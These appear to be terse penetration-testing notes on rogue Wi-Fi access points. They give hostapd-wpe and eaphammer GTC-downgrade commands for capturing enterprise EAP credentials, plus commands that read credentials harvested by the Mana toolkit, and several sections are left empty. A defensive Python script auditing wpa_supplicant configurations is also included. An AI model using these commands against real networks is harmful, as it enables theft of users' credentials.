Rogue AP and MANA

Rogue AP - EAP

hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf

GTC downgrade

Effective against Android phones.

Effective against iOS, but it prompts for the certificate.

Against Windows, only a challenge-response can be captured.

Does not work if:

  • the supplicant uses certificate-based authentication, since there is no inner authentication
  • the supplicant validates the server certificate
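
A defender-side check for the two conditions above, as an added example that is not part of the original notes: it audits wpa_supplicant network blocks for missing server-certificate validation and for an unpinned or GTC inner method. The sample configuration, SSIDs and file paths are constructed, and the parser assumes flat key=value network blocks.

```python
import re

# Constructed wpa_supplicant.conf sample; SSIDs, paths and names are made up.
SAMPLE_CONF = '''
network={
    ssid="corp-weak"
    key_mgmt=WPA-EAP
    eap=PEAP
}
network={
    ssid="corp-pinned"
    key_mgmt=WPA-EAP
    eap=PEAP
    ca_cert="/etc/ssl/certs/corp-ca.pem"
    domain_suffix_match="radius.corp.example"
    phase2="auth=MSCHAPV2"
}
network={
    ssid="corp-tls"
    key_mgmt=WPA-EAP
    eap=TLS
    ca_cert="/etc/ssl/certs/corp-ca.pem"
    domain_suffix_match="radius.corp.example"
    client_cert="/etc/ssl/certs/alice.pem"
}
'''

# Any one of these ties the accepted certificate to the expected RADIUS server.
NAME_CHECKS = ("domain_suffix_match", "domain_match", "subject_match", "altsubject_match")

def audit(conf_text):
    """Return {ssid: [findings]} for every WPA-EAP network block."""
    report = {}
    for block in re.findall(r"network=\{(.*?)\n\}", conf_text, re.S):
        pairs = re.findall(r"^\s*(\w+)=(.*?)\s*$", block, re.M)
        kv = {key: value.strip('"') for key, value in pairs}
        if "EAP" not in kv.get("key_mgmt", ""):
            continue  # open/PSK networks are out of scope here
        findings = []
        if "ca_cert" not in kv:
            findings.append("no ca_cert: server certificate is not validated")
        if not any(key in kv for key in NAME_CHECKS):
            findings.append("no server name match: any certificate from the CA passes")
        inner = kv.get("phase2", "")
        # EAP-TLS has no inner method; tunnelled methods should pin a non-GTC one.
        if kv.get("eap") != "TLS" and (not inner or "GTC" in inner.upper()):
            findings.append("inner method unpinned or GTC: password may be sent in cleartext")
        report[kv.get("ssid", "?")] = findings
    return report
```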

Balanced Approach (default)

Phase 1 (outer authentication):


Phase 2 (inner authentication):


Explicit GTC downgrade

./eaphammer --interface <wlan0> --negotiate gtc-downgrade --auth wpa-eap --essid <ESSID> --creds [--hw-mode <g/a>] [-c <channel>] [-b <BSSID>]

Rogue AP - OPEN or PSK


Mana is deprecated.
I use a custom dedicated Kali VM.

Start Mana - Custom script



cat /var/lib/mana-toolkit/net-creds*
cat /var/lib/mana-toolkit/sslsplit-connect*
cat /var/lib/mana-toolkit/sslstrip.log*
strings /var/lib/mana-toolkit/sslsplit/* | grep -i <keyword>